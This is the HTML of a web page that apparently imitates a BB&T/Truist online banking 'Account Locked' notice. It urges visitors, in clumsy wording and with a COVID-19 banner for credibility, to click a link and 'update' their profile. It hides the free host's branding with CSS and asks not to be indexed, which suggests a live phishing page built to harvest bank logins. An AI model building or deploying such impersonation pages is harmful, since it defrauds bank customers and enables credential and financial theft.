<html class="ua-windows_nt ua-windows_nt-6 ua-windows_nt-6-1 ua-gecko ua-gecko-54 ua-gecko-54-0 ua-firefox ua-firefox-54 ua-firefox-54-0 ua-desktop ua-desktop-windows js gt-ie8"><head>
<meta charset="UTF-8">

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

<meta name="ROBOTS" content="NOINDEX, NOFOLLOW">

<title>
Account Locked</title>

<meta name="description" content="">

<meta name="viewport" content="initial-scale = 1, maximum-scale=2.0, user-scalable=yes">
<meta name="format-detection" content="telephone=yes">


<link href="T.goe/1.ico" rel="Shortcut Icon">
<link href="T.goe/un.css" rel="stylesheet" media="screen, print">

</head>
<body class="no-auth" id="retail-login" onkeydown="submitMeOnEnter(event)">
<input id="helpUrlId" type="hidden">
<header id="header">
<div class="cf" id="main-nav">
<div class="wrapper">

<div id="logo">
<p><img src="https://i.imgur.com/fuzrfho.png" width="209" height="89" /></p>
</div>

</div>

</header>

<div class="retail-login exceptions" id="content-wrapper">
<strong>
</strong><div class="wrapper"><strong>

</strong><div id="page-header"><strong>

</strong><h1><font size="4">Update Your Online Profile</font></h1><strong>

</strong></div><strong>

</strong><section class="column-one"><strong>
</strong><article class="module"><strong>

<strong style="font-family: &quot;arial narrow&quot;; background-color: rgb(255, 255, 255);"><span style="color: rgb(255, 0, 0);"><img src="https://www1.bac-assets.com/hp-assets/spa-assets/images/assets-images-site-hp-assets-engagement-banner-consumer-core_icon_info1_186rgb_simple-crushed-CSX32d8cc03.svg" width="27" height="27" />&nbsp;Alert</span>&nbsp;Here For You &ndash; Updates On COVID-19 Assistance And Services</strong>
<br /><br />
<hr id="null" />

</strong><div class="mod-content"><strong>

</strong><h2><font size="3">As Part of Its Security Measures,During Our Regularly Scheduled System, please Update Profile.</font></h2><font size="5">
</font><p><a class="submit-link" href="v.html"><font size="3">Click Here to Update Your Account</font></a></p>
<div class="clear">
</div>
</div>

</article>

<footer class="mod-footer">
</footer>

</section>
</div>

</div>

<footer id="footer">

<div class="wrapper">

<p>Online Banking Support Department</p>

<p class="footer-links"><a href="">BB&amp;T Home</a> | <a href=""> Privacy &amp; Security</a> | <a href="">Disclosures</a> </p>

<p><p>&copy;2021, Truist Financial Corporation. All rights reserved.</p>
</div>
		
</footer>




</body><style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
display: none;}
</style></html>